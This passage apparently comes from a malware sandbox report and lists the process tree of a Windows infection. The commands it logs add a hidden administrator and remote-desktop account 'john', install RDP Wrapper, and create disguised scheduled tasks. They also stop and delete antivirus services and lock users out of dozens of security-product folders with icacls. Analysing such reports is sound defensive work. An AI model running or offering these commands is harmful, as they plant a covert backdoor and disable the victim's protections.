C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:3412

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:4688

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:3956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:3488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:4492

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:1900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:3348

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:1836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:4552

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:3692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:2912

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:4472

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:3100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:3356

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:1812

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:4572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:552

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:4528

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
PID:5140

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:5164

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:5184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:5204

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Views/modifies file attributes
PID:5224

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Views/modifies file attributes
PID:5244

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:5264

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:1504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
4⤵
- Drops file in Drivers directory
PID:204

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4256

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4904

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:644

C:\ProgramData\WindowsTask\update.exe
C:\ProgramData\WindowsTask\update.exe
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2160

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:4524

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:4576

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:2316

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:2980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
2⤵
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
2⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
3⤵
PID:2476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
2⤵
PID:2716

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
3⤵
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
2⤵
PID:2256

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
3⤵
PID:1160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:2096

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
2⤵
PID:372

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
3⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
2⤵
PID:3840

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
3⤵
PID:4188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
2⤵
PID:4000

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
3⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
2⤵
PID:3924

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
3⤵
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
2⤵
PID:1116

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
3⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
2⤵
PID:1120

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
2⤵
PID:1292

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:1584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
2⤵
PID:4088

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
2⤵
PID:2412

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:2420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
2⤵
PID:3872

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
2⤵
PID:3016

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
2⤵
PID:2592

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
2⤵
PID:936

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
2⤵
PID:2244

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
2⤵
PID:2872

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
2⤵
PID:4180

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
2⤵
PID:1424

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
2⤵
PID:4312

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
2⤵
PID:3852

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
2⤵
PID:4172

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
2⤵
PID:3848

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
2⤵
PID:1180

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
2⤵
PID:1536

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
3⤵
- Modifies file permissions
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
2⤵
PID:1316

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
- Modifies file permissions
PID:2588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
2⤵
PID:1596

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
3⤵
- Modifies file permissions
PID:3644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
2⤵
PID:4892

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
- Modifies file permissions
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
2⤵
PID:4760

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
2⤵
PID:1528

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
2⤵
PID:4776

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
2⤵
PID:4744

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
2⤵
PID:2108

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
2⤵
PID:4196

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
2⤵
PID:2348

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
2⤵
PID:4260

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:612

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
2⤵
PID:1364

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
2⤵
PID:2808

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
2⤵
PID:4304

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:1712

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:2428

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4888

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:2156

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:192

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4080

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
2⤵
PID:3700

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:3408

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2788

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
2⤵
PID:4412

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
2⤵
PID:3708

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:4520

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2852

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:2416

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4536

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
2⤵
PID:3908

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
2⤵
PID:1908

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4060

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:3688

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:1780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:4064

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
2⤵
PID:2596

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
2⤵
PID:1372

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:4832

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:4900

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:4200

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:3320

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
2⤵
PID:3360

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1156

C:\Programdata\Install\utorrent.exe
C:\Programdata\Install\utorrent.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
PID:4352

C:\ProgramData\WindowsTask\azur.exe
C:\ProgramData\WindowsTask\azur.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
4⤵
PID:4052

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
5⤵
- Delays execution with timeout.exe
PID:1988

C:\ProgramData\WindowsTask\system.exe
C:\ProgramData\WindowsTask\system.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "
4⤵
PID:5444

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -u
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
